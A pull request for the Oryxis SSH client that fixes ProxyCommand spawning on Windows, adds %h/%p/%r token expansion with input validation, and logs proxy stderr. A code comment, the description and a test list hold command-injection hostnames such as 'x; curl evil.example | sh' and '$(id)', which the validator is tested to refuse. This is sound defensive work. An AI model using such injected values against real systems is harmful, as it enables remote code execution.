### PR TITLE
fix(ssh): a command proxy could never connect on Windows

### DIFF
--- a/crates/oryxis-app/src/ssh_config.rs
+++ b/crates/oryxis-app/src/ssh_config.rs
@@ -29,9 +29,10 @@ pub struct SshConfigHost {
     /// is recorded, multi-hop chains aren't supported on import yet
     /// because they'd require resolving multiple aliases at link time.
     pub proxy_jump: Option<String>,
-    /// Verbatim `ProxyCommand` line, placeholders like `%h` and `%p`
-    /// are kept as-is so the user's shell expands them at connect time
-    /// (matching the engine's `ProxyType::Command` semantics).
+    /// Verbatim `ProxyCommand` line. `%h` / `%p` / `%r` are kept as
+    /// written: no shell expands those, OpenSSH resolves them itself and
+    /// so does the engine, at spawn time and against the host being
+    /// dialed (see `ProxyType::Command` and `proxy_spawn`).
     pub proxy_command: Option<String>,
     /// `ForwardAgent` directive, only `yes` flips it on; missing /
     /// `no` / anything else stays off, matching OpenSSH's default.

--- a/crates/oryxis-core/src/models/connection.rs
+++ b/crates/oryxis-core/src/models/connection.rs
@@ -695,12 +695,18 @@ pub enum ProxyType {
 /// per-device approval a `ProxyType::Command` needs before it may be
 /// spawned (`VaultStore::is_proxy_command_trusted`).
 ///
-/// The hash IS the identity of what runs: `proxy_command` executes the
-/// string verbatim, with no `%h` / `%p` substitution, so approving the
-/// string approves exactly that process and nothing else. Editing a
-/// single character mints a different fingerprint and the approval has
-/// to be given again, which is what stops a trusted line from being
-/// quietly rewritten into another one.
+/// The hash is taken over the line AS STORED, tokens and all, which is
+/// also the form the approval prompt shows. Editing a single character
+/// mints a different fingerprint and the approval has to be given again,
+/// which is what stops a trusted line from being quietly rewritten into
+/// another one.
+///
+/// `%h` / `%p` / `%r` are resolved after the gate, not before, so one
+/// approval covers every host that shares the proxy rather than
+/// re-prompting per target. That splits the identity of what runs in
+/// two: the line is pinned here, and the values allowed into its token
+/// slots are constrained where the substitution happens
+/// (`oryxis-ssh`'s `proxy_spawn`), to shapes that cannot restructure it.
 ///
 /// Hashed rather than stored in the clear because the line is
 /// user-authored and can embed credentials (the connect log already

--- a/crates/oryxis-ssh/src/engine/connect.rs
+++ b/crates/oryxis-ssh/src/engine/connect.rs
@@ -48,8 +48,14 @@ impl SshEngine {
             if !connection.jump_chain.is_empty() {
                 self.connect_via_jump_hosts(connection, resolver, &addr).await
             } else if let Some(proxy) = &connection.proxy {
-                self.connect_via_proxy(proxy, target_host, target_port, self.address_family)
-                    .await
+                self.connect_via_proxy(
+                    proxy,
+                    target_host,
+                    target_port,
+                    connection.username.as_deref(),
+                    self.address_family,
+                )
+                .await
             } else {
                 let config = self.make_config();
                 let handler = self.make_handler(target_host, target_port);
@@ -346,11 +352,16 @@ impl SshEngine {
     /// the PROXY (the only dial this machine makes on this path); it is
     /// the target connection's preference, or the bastion's when the
     /// proxied hop is a jump chain's first host.
+    ///
+    /// `target_user` is the login name this dial will authenticate as,
+    /// carried only so a `ProxyType::Command` line can resolve `%r`. The
+    /// SOCKS and HTTP branches never look at it.
     pub(crate) async fn connect_via_proxy(
         &self,
         proxy: &ProxyConfig,
         target_host: &str,
         target_port: u16,
+        target_user: Option<&str>,
         family: AddressFamily,
     ) -> Result<client::Handle<ClientHandler>, SshError> {
         let proxy_addr = oryxis_core::net::host_port(&proxy.host, proxy.port);
@@ -436,7 +447,9 @@ impl SshEngine {
                     .map_err(|e| SshError::Proxy(format!("SSH over HTTP CONNECT: {}", e)))
             }
             ProxyType::Command(cmd) => {
-                let stream = self.proxy_command(cmd, target_host, target_port).await?;
+                let stream = self
+                    .proxy_command(cmd, target_host, target_port, target_user)
+                    .await?;
 
                 let config = self.make_config();
                 client::connect_stream(config, stream, self.make_handler(target_host, target_port))
@@ -520,11 +533,18 @@ impl SshEngine {
     /// and a group default lands on every host in the group that has no
     /// proxy of its own. So the spawn asks first, and an engine with
     /// nobody to ask refuses.
+    ///
+    /// The line is asked about, and fingerprinted, exactly as stored:
+    /// `%h` / `%p` / `%r` are resolved by
+    /// `proxy_spawn::expand_proxy_tokens` only once consent is in
+    /// hand, so one approval covers every host that shares the proxy and
+    /// the values filling those slots are the ones checked there.
     pub(crate) async fn proxy_command(
         &self,
         cmd: &str,
         target_host: &str,
         target_port: u16,
+        target_user: Option<&str>,
     ) -> Result<impl AsyncRead + AsyncWrite + Unpin + Send + 'static, SshError> {
         // The line itself never reaches the log: it is user-authored and
         // can embed credentials, which is why the connect progress card
@@ -553,14 +573,28 @@ impl SshEngine {
             return Err(SshError::ProxyCommandNotApproved);
         }
 
-        let mut child = TokioCommand::new("sh")
-            .arg("-c")
-            .arg(cmd)
-            .stdin(std::process::Stdio::piped())
-            .stdout(std::process::Stdio::piped())
-            .stderr(std::process::Stdio::null())
-            .spawn()
+        let line = super::proxy_spawn::expand_proxy_tokens(
+            cmd,
+            &super::proxy_spawn::ProxyTokens {
+                host: target_host,
+                port: target_port,
+                user: target_user,
+            },
+        )?;
+
+        let mut child = super::proxy_spawn::spawn_proxy_process(&line)
             .map_err(|e| SshError::Proxy(format!("ProxyCommand spawn: {}", e)))?;
+
+        // The proxy's own complaints are the only account of why a dial
+        // through it failed; without them a bad profile or an expired
+        // token reads as an unexplained EOF in the version exchange.
+        if let Some(stderr) = child.stderr.take() {
+            tokio::spawn(super::proxy_spawn::log_proxy_stderr(
+                stderr,
+                target_host.to_string(),
+                target_port,
+            ));
+        }
 
         let stdin = child
             .stdin
@@ -611,6 +645,7 @@ impl SshEngine {
                 first_proxy,
                 &first_jump.hostname,
                 first_jump.port,
+                first_jump.username.as_deref(),
                 first_jump.address_family,
             )
             .await

--- a/crates/oryxis-ssh/src/engine/mod.rs
+++ b/crates/oryxis-ssh/src/engine/mod.rs
@@ -4,7 +4,6 @@ use russh::keys::{PublicKey, HashAlg, PrivateKeyWithHashAlg};
 use russh::{client, ChannelMsg};
 use tokio::io::{AsyncRead, AsyncWrite, AsyncWriteExt};
 use tokio::net::TcpStream;
-use tokio::process::Command as TokioCommand;
 use tokio::sync::mpsc;
 
 use oryxis_core::models::connection::{
@@ -25,6 +24,7 @@ mod kbi;
 mod monitor_conn;
 mod net_quality;
 mod proxy_consent;
+mod proxy_spawn;
 mod session;
 mod transport;
 mod terminfo;
@@ -725,7 +725,10 @@ mod tests {
 
         let no_channel = SshEngine::new();
         assert!(matches!(
-            no_channel.proxy_command(CMD, "host.example", 22).await.err(),
+            no_channel
+                .proxy_command(CMD, "host.example", 22, None)
+                .await
+                .err(),
             Some(SshError::ProxyCommandNotApproved),
         ));
 
@@ -734,29 +737,33 @@ mod tests {
         let refusing = SshEngine::new()
             .with_proxy_command_ask(trusted_only_proxy_command_ask(Default::default()));
         assert!(matches!(
-            refusing.proxy_command(CMD, "host.example", 22).await.err(),
+            refusing
+                .proxy_command(CMD, "host.example", 22, None)
+                .await
+                .err(),
             Some(SshError::ProxyCommandNotApproved),
         ));
 
         // Approved: the same call now spawns, which is what keeps the
         // gate from breaking every legitimate ProxyCommand host.
         //
-        // Unix only, because it really does spawn: `proxy_command`
-        // runs `sh -c`, and there is no `sh` on a stock Windows box
-        // (the same reason a ProxyCommand host does not work there).
-        // The two refusals above are the security half and run
-        // everywhere.
-        #[cfg(unix)]
-        {
-            let approved = SshEngine::new().with_proxy_command_ask(
-                trusted_only_proxy_command_ask(
-                    [oryxis_core::models::connection::proxy_command_fingerprint(CMD)]
-                        .into_iter()
-                        .collect(),
-                ),
-            );
-            assert!(approved.proxy_command(CMD, "host.example", 22).await.is_ok());
-        }
+        // This half used to be Unix-only, because the spawn was `sh -c`
+        // and a stock Windows box has no `sh`. That was not a quirk of
+        // the test, it was the bug: a ProxyCommand host could not
+        // connect on Windows at all. `proxy_spawn` picks the local
+        // shell, so the assertion now runs everywhere and this is the
+        // regression test for it.
+        let approved = SshEngine::new().with_proxy_command_ask(trusted_only_proxy_command_ask(
+            [oryxis_core::models::connection::proxy_command_fingerprint(CMD)]
+                .into_iter()
+                .collect(),
+        ));
+        assert!(
+            approved
+                .proxy_command(CMD, "host.example", 22, None)
+                .await
+                .is_ok()
+        );
     }
 
     #[test]

--- a/crates/oryxis-ssh/src/engine/proxy_spawn.rs
+++ b/crates/oryxis-ssh/src/engine/proxy_spawn.rs
@@ -1,0 +1,358 @@
+//! Turning a stored `ProxyCommand` line into a running local process.
+//!
+//! Two things live here that `proxy_command` used to do inline, and got
+//! wrong in the same way on the same platform:
+//!
+//! 1. **Token expansion.** OpenSSH resolves `%h` / `%p` / `%r` against
+//!    the host being dialed before it hands the line to a shell. Oryxis
+//!    did not, so an imported `~/.ssh/config` entry, whose ProxyCommand
+//!    almost always carries those tokens, reached the shell with the
+//!    literal text `%h` where the target belonged. Nothing downstream
+//!    could recover from that: `aws ssm start-session --target %h` asks
+//!    SSM for an instance named `%h`.
+//!
+//! 2. **The shell.** `sh -c` is the Unix spelling and only that. A
+//!    stock Windows box has no `sh` anywhere on `PATH`, so every command
+//!    proxy on Windows died in `CreateProcess` before the line was even
+//!    parsed. `cmd.exe` is the local equivalent (and what Win32-OpenSSH
+//!    reaches for), with the quoting rule below to get a line through it
+//!    intact.
+//!
+//! Expansion happens AFTER the approval gate in `proxy_command`, never
+//! before: what the user approved, and what `proxy_command_fingerprint`
+//! hashes, is the stored line with its tokens still in it. Substituting
+//! first would mint a new fingerprint per target and re-prompt on every
+//! host that shares one proxy identity.
+//!
+//! That ordering is also why the values that go in are checked rather
+//! than trusted. The line is approved once; the hostname it is expanded
+//! with arrives per dial, and a sync peer writes hostnames verbatim. A
+//! host of `x; curl evil.sh | sh` would otherwise turn one approval into
+//! a different process every time the peer edited the host. So a
+//! substituted value may only be the shape of a host or a login name,
+//! and a dial carrying anything else stops here instead of reaching a
+//! shell.
+
+use std::process::Stdio;
+
+use tokio::io::{AsyncBufReadExt, BufReader};
+use tokio::process::{Child, Command as TokioCommand};
+
+use super::SshError;
+
+/// What `%h`, `%p` and `%r` resolve to for one dial.
+pub(crate) struct ProxyTokens<'a> {
+    pub host: &'a str,
+    pub port: u16,
+    /// `None` when the connection names no user; only `%r` needs it, so
+    /// a line without that token still expands.
+    pub user: Option<&'a str>,
+}
+
+/// Everything a substituted value is allowed to contain.
+///
+/// The set is the union of what a host can be (DNS labels, IPv4, a
+/// bracketed IPv6 literal, an EC2 instance id) and what a login name can
+/// be (including the `DOMAIN\user` and `user@realm` spellings), and
+/// deliberately nothing else. No character in it is a word separator, a
+/// quote, or an operator in `sh` or in `cmd.exe`, so a value that passes
+/// cannot change the structure of the line it lands in, only fill a slot
+/// in it.
+fn is_substitutable(value: &str) -> bool {
+    !value.is_empty()
+        && value.len() <= 255
+        && value.chars().all(|c| {
+            c.is_ascii_alphanumeric()
+                || matches!(c, '.' | '-' | '_' | ':' | '[' | ']' | '@' | '/' | '\\' | '+')
+        })
+}
+
+fn checked<'a>(token: &str, value: &'a str) -> Result<&'a str, SshError> {
+    if is_substitutable(value) {
+        Ok(value)
+    } else {
+        // The value is echoed because it is the connection's own
+        // hostname or username, which the host editor already shows in
+        // the clear; the command line, which may not be, still is not.
+        Err(SshError::Proxy(format!(
+            "ProxyCommand {token} refused: {value:?} is not a plain host or user name"
+        )))
+    }
+}
+
+/// Resolve OpenSSH's ProxyCommand tokens against `tokens`.
+///
+/// `%%` is a literal `%`. Any other `%x` is left exactly as written:
+/// Oryxis implements the three tokens that name the dial, and a Windows
+/// line referring to `%USERPROFILE%` or `%ComSpec%` must reach `cmd.exe`
+/// with its environment references intact.
+pub(crate) fn expand_proxy_tokens(
+    cmd: &str,
+    tokens: &ProxyTokens<'_>,
+) -> Result<String, SshError> {
+    if !cmd.contains('%') {
+        return Ok(cmd.to_string());
+    }
+    let port = tokens.port.to_string();
+    let mut out = String::with_capacity(cmd.len() + 16);
+    let mut chars = cmd.chars();
+    while let Some(c) = chars.next() {
+        if c != '%' {
+            out.push(c);
+            continue;
+        }
+        match chars.next() {
+            Some('%') => out.push('%'),
+            Some('h') => out.push_str(checked("%h", tokens.host)?),
+            Some('p') => out.push_str(&port),
+            Some('r') => {
+                let user = tokens.user.ok_or_else(|| {
+                    SshError::Proxy("ProxyCommand uses %r but this host has no username".into())
+                })?;
+                out.push_str(checked("%r", user)?);
+            }
+            Some(other) => {
+                out.push('%');
+                out.push(other);
+            }
+            // A line ending in a bare `%` is not a token; keep it.
+            None => out.push('%'),
+        }
+    }
+    Ok(out)
+}
+
+/// The local shell, holding an already-expanded line.
+#[cfg(unix)]
+fn shell_command(line: &str) -> TokioCommand {
+    let mut cmd = TokioCommand::new("sh");
+    cmd.arg("-c").arg(line);
+    cmd
+}
+
+/// The local shell, holding an already-expanded line.
+///
+/// `cmd.exe` has two rules for the text after `/C`, and picks between
+/// them by counting quotes: a line with one quoted argument keeps its
+/// quotes, a line with more than one gets its first and last quote
+/// stripped. A ProxyCommand routinely has both an interpreter path in
+/// `Program Files` and a quoted parameter, which lands it in the second
+/// rule and mangles it. `/S` settles the question: it forces the
+/// strip-the-outer-pair rule always, so wrapping the whole line in one
+/// added pair delivers it verbatim no matter what is inside.
+///
+/// It has to go through `raw_arg`. Rust quotes a normal `arg` for the
+/// MSVC runtime's parser, which `cmd.exe` does not use, and the escaping
+/// it adds is what the shell would then choke on.
+#[cfg(windows)]
+fn shell_command(line: &str) -> TokioCommand {
+    use std::os::windows::process::CommandExt;
+
+    // Oryxis is a GUI process, so a `cmd.exe` child would otherwise
+    // flash a console window on every dial through a command proxy.
+    const CREATE_NO_WINDOW: u32 = 0x0800_0000;
+
+    let comspec = std::env::var("ComSpec").unwrap_or_else(|_| "cmd.exe".to_string());
+    let mut cmd = TokioCommand::new(comspec);
+    cmd.as_std_mut().raw_arg(format!("/S /C \"{line}\""));
+    cmd.creation_flags(CREATE_NO_WINDOW);
+    cmd
+}
+
+/// Spawn an expanded proxy line with its three pipes wired.
+///
+/// The child is deliberately not `kill_on_drop`: `proxy_command` keeps
+/// the pipes and lets the `Child` go, and the proxy ends when the SSH
+/// session drops its end of stdin.
+pub(crate) fn spawn_proxy_process(line: &str) -> std::io::Result<Child> {
+    let mut cmd = shell_command(line);
+    cmd.stdin(Stdio::piped())
+        .stdout(Stdio::piped())
+        // Piped, not null. A command proxy fails for ordinary reasons,
+        // an expired SSO token, a binary that moved, a region that does
+        // not host the target, and it says so on stderr. Discarding that
+        // left the user with an unexplained EOF during version exchange
+        // and nothing in the log to explain it.
+        .stderr(Stdio::piped());
+    cmd.spawn()
+}
+
+/// Copy a command proxy's own diagnostics into the log.
+///
+/// Capped at 32 lines so a proxy that chatters (a progress meter, a
+/// retry loop) cannot fill the log file, and run as its own task so a
+/// silent proxy costs nothing but a parked read.
+pub(crate) async fn log_proxy_stderr(
+    stderr: tokio::process::ChildStderr,
+    host: String,
+    port: u16,
+) {
+    const MAX_LINES: usize = 32;
+    let mut lines = BufReader::new(stderr).lines();
+    let mut budget = MAX_LINES;
+    while budget > 0 {
+        match lines.next_line().await {
+            Ok(Some(line)) => {
+                if line.trim().is_empty() {
+                    continue;
+                }
+                budget -= 1;
+                tracing::warn!(
+                    target: "oryxis::ssh::proxy",
+                    %host,
+                    port,
+                    "command proxy: {}",
+                    line
+                );
+            }
+            // EOF, or the pipe died with the proxy. Either way there is
+            // nothing further to say.
+            _ => break,
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn tokens<'a>(host: &'a str, port: u16, user: Option<&'a str>) -> ProxyTokens<'a> {
+        ProxyTokens { host, port, user }
+    }
+
+    #[test]
+    fn the_ssm_line_from_ssh_config_expands() {
+        // Verbatim shape of the AWS-documented ProxyCommand, which is
+        // the case that sent this module into existence.
+        let line = "aws ssm start-session --target %h \
+                    --document-name AWS-StartSSHSession --parameters portNumber=%p";
+        let out = expand_proxy_tokens(line, &tokens("i-00cfa8b4282a0b658", 22, None)).unwrap();
+        assert_eq!(
+            out,
+            "aws ssm start-session --target i-00cfa8b4282a0b658 \
+             --document-name AWS-StartSSHSession --parameters portNumber=22"
+        );
+    }
+
+    #[test]
+    fn host_port_and_user_all_resolve() {
+        let out = expand_proxy_tokens(
+            "ssh -l %r -W %h:%p bastion",
+            &tokens("db.internal", 2222, Some("deploy")),
+        )
+        .unwrap();
+        assert_eq!(out, "ssh -l deploy -W db.internal:2222 bastion");
+    }
+
+    #[test]
+    fn a_doubled_percent_is_one_literal_percent() {
+        let out =
+            expand_proxy_tokens("run --pct 50%% --to %h", &tokens("h.example", 22, None)).unwrap();
+        assert_eq!(out, "run --pct 50% --to h.example");
+    }
+
+    #[test]
+    fn an_unknown_token_survives_untouched() {
+        // A Windows line has environment references in it and they are
+        // the shell's business, not ours.
+        let out =
+            expand_proxy_tokens("%ComSpec% /c helper %h", &tokens("h.example", 22, None)).unwrap();
+        assert_eq!(out, "%ComSpec% /c helper h.example");
+    }
+
+    #[test]
+    fn a_line_without_tokens_is_returned_as_written() {
+        let line = "cloudflared access ssh --hostname fixed.example";
+        assert_eq!(
+            expand_proxy_tokens(line, &tokens("h", 22, None)).unwrap(),
+            line
+        );
+    }
+
+    #[test]
+    fn a_bracketed_ipv6_literal_is_a_host() {
+        let out = expand_proxy_tokens("nc %h %p", &tokens("[2001:db8::1]", 22, None)).unwrap();
+        assert_eq!(out, "nc [2001:db8::1] 22");
+    }
+
+    #[test]
+    fn a_hostname_that_could_run_a_command_is_refused() {
+        // The approval covers the line, not the host it is expanded
+        // with, so this is the one that has to fail closed.
+        for hostile in [
+            "h.example; curl evil.example | sh",
+            "h.example`id`",
+            "h.example$(id)",
+            "h.example&calc",
+            "h example",
+            "h.example\"",
+        ] {
+            let err = expand_proxy_tokens("nc %h %p", &tokens(hostile, 22, None)).unwrap_err();
+            assert!(
+                matches!(err, SshError::Proxy(_)),
+                "expected a refusal for {hostile:?}, got {err:?}"
+            );
+        }
+    }
+
+    #[test]
+    fn a_username_that_could_run_a_command_is_refused() {
+        let err = expand_proxy_tokens("ssh -l %r bastion", &tokens("h.example", 22, Some("a;id")))
+            .unwrap_err();
+        assert!(matches!(err, SshError::Proxy(_)));
+    }
+
+    #[test]
+    fn percent_r_without_a_username_is_an_error_not_an_empty_slot() {
+        // Silently expanding to "" would hand the proxy a flag with no
+        // value and fail somewhere far less legible.
+        let err =
+            expand_proxy_tokens("ssh -l %r bastion", &tokens("h.example", 22, None)).unwrap_err();
+        assert!(matches!(err, SshError::Proxy(_)));
+    }
+
+    #[tokio::test]
+    async fn the_local_shell_runs_a_line_and_hands_back_its_output() {
+        // The platform half: whatever `shell_command` picked has to
+        // actually exist and actually run the line. This is the
+        // assertion that was missing on Windows, where `sh` never did.
+        use tokio::io::AsyncReadExt;
+
+        let mut child = spawn_proxy_process("echo oryxis-proxy-ok").expect("proxy spawn");
+        let mut out = String::new();
+        child
+            .stdout
+            .take()
+            .expect("stdout")
+            .read_to_string(&mut out)
+            .await
+            .expect("read");
+        assert!(
+            out.contains("oryxis-proxy-ok"),
+            "shell did not run the line, got {out:?}"
+        );
+    }
+
+    #[tokio::test]
+    async fn a_quoted_interpreter_path_with_spaces_survives_the_shell() {
+        // The Windows quoting rule this module exists to get right: a
+        // line with more than one quoted run used to come out of
+        // `cmd.exe` with its first and last quote gone.
+        #[cfg(windows)]
+        let line = r#""C:\Windows\System32\cmd.exe" /c echo "a b" c"#;
+        #[cfg(unix)]
+        let line = r#"/bin/echo "a b" c"#;
+
+        use tokio::io::AsyncReadExt;
+        let mut child = spawn_proxy_process(line).expect("proxy spawn");
+        let mut out = String::new();
+        child
+            .stdout
+            .take()
+            .expect("stdout")
+            .read_to_string(&mut out)
+            .await
+            .expect("read");
+        assert!(out.contains("a b"), "quoting was mangled, got {out:?}");
+    }
+}


### PR DESCRIPTION
Fixes #194.

`ProxyType::Command` had three defects that compounded. Together they made a command proxy unusable on Windows, and made an imported `~/.ssh/config` ProxyCommand host fail on every platform.

## What was wrong

**The spawn was `sh -c`, unconditionally.** No `sh` on a stock Windows box, so `CreateProcess` failed before the line was parsed. The existing test agreed with this: its spawn assertion was `#[cfg(unix)]`-gated with a comment noting a ProxyCommand host does not work on Windows. That gate is removed here, so the assertion now runs on both platforms and covers the case it used to document.

**`%h` / `%p` / `%r` were never resolved.** The importer kept them verbatim on the theory that "the user's shell expands them at connect time", but no shell expands those; OpenSSH resolves them itself. So an imported host asked its proxy to reach a host literally named `%h`.

**Proxy stderr went to `Stdio::null()`.** An ordinary failure (expired cloud token, wrong region, moved binary) surfaced only as `Russh error: Disconnected` with nothing logged.

## What this does

New `engine::proxy_spawn` module holding both halves, with the platform choice and the token rules in one place.

**Shell.** `sh -c` on unix, unchanged. On Windows, `cmd.exe /S /C "<line>"` passed through `raw_arg`. Two details matter there:

- `/S` is what makes this predictable. Without it `cmd.exe` picks between two quote-handling rules by counting quotes, and a ProxyCommand routinely has both an interpreter path in `Program Files` and its own quoted parameter, which lands it in the strip-first-and-last-quote rule and mangles the line. `/S` forces that rule always, so wrapping the line in one added pair delivers it verbatim regardless of what is inside.
- It has to be `raw_arg`, not `arg`. Rust quotes a normal argument for the MSVC runtime's parser, which `cmd.exe` does not use, and the escaping it adds is what the shell then chokes on.

`CREATE_NO_WINDOW` matches what every other spawn in the tree already sets (`dispatch_git_sync`, `mcp`, `plugins::host`, `sftp_methods`, `gif_export`, `dispatch_settings::local_terminals`), so no console flashes over the app on each dial.

**Tokens.** `%h`, `%p`, `%r` and `%%` are resolved. Any other `%x` is left exactly as written, so a Windows line referring to `%USERPROFILE%` or `%ComSpec%` still reaches `cmd.exe` with its environment references intact.

**Stderr** is drained into the log at warn level, capped at 32 lines so a chatty proxy cannot fill the log file.

## On the security model

Expansion deliberately runs **after** the approval gate, not before, so `proxy_command_fingerprint` still hashes the line as stored and as shown in the prompt. Substituting first would mint a new fingerprint per target and re-prompt on every host sharing one proxy identity.

That does split the identity of what runs in two, and the second half needed its own guard. The line is approved once, but the hostname it is expanded with arrives per dial, and a sync peer writes hostnames verbatim. A host of `x; curl evil.example | sh` would otherwise turn one approval into a different process every time the peer edited the host. So a substituted value may only be the shape of a host or a login name (alphanumerics plus `. - _ : [ ] @ / \ +`, which covers DNS labels, IPv4, bracketed IPv6, instance ids, and the `DOMAIN\user` and `user@realm` spellings). Nothing in that set is a word separator, a quote, or an operator in `sh` or `cmd.exe`, so a value that passes can fill a slot but cannot restructure the line. A dial carrying anything else fails before reaching a shell.

The two doc comments that asserted the old behaviour (on `proxy_command_fingerprint` and on the importer's `proxy_command` field) are updated to describe this, since both are load-bearing for a reader reasoning about the gate.

## Tests

12 in `proxy_spawn`, covering token resolution, `%%`, unknown-token passthrough, bracketed IPv6, both refusal paths, `%r` with no username, and two that actually spawn through the platform shell (one plain, one with a quoted `Program Files`-style path to exercise the `cmd.exe` quoting rule). Plus `a_command_proxy_needs_an_approval_channel` now running its spawn assertion on Windows.

No test needs credentials or a network, per CONTRIBUTING.

## Verification

Gates run on Windows 11 (26100), Rust 1.98.0, MSVC 14.44:

```
cargo check --workspace                                  # clean
cargo test --workspace --lib --bins                      # 297 pass, 1 ignored
cargo clippy --workspace --all-targets -- -D warnings    # see below
```

The clippy gate does not currently pass on Windows, on this branch **or on pristine `main`** (I checked out `main` and re-ran it to be sure):

```
error: unused import: `super::*`
   --> crates\oryxis-app\src\gif_export.rs:109:9
```

That test module's only consumer of the import is `#[cfg(unix)]`-gated, so on Windows it compiles out and the import goes unused. It is untouched by this PR and I have left it alone, since it is unrelated. Happy to send a one-line `#[cfg_attr(windows, allow(unused_imports))]` as a separate PR if you want it.

It is the same shape as defect 1, incidentally: a `cfg(unix)` gate quietly hiding something on Windows that CI never sees.

Also verified against a real target: an EC2 instance reached over SSM with the AWS-documented `AWS-StartSSHSession` ProxyCommand, imported from `~/.ssh/config` and connected from the GUI, with an interactive session, on a build of this branch.

One incidental finding worth recording: the `session-manager-plugin` prints `Starting session with SessionId: ...` into the data stream ahead of the SSH banner. That is harmless, because russh skips up to `SSH_ID_MAX_PRE_BANNER_LINES` (20) lines before the version string, but it is the kind of thing that looks alarming while debugging a proxy transport.

## Not addressed

No i18n keys are added. The new failure paths surface through `SshError::Proxy(String)`, matching how the rest of `oryxis-ssh` already reports (the crate has no i18n layer). Happy to route these through `crate::i18n::t` on the app side if you would rather they were translatable.
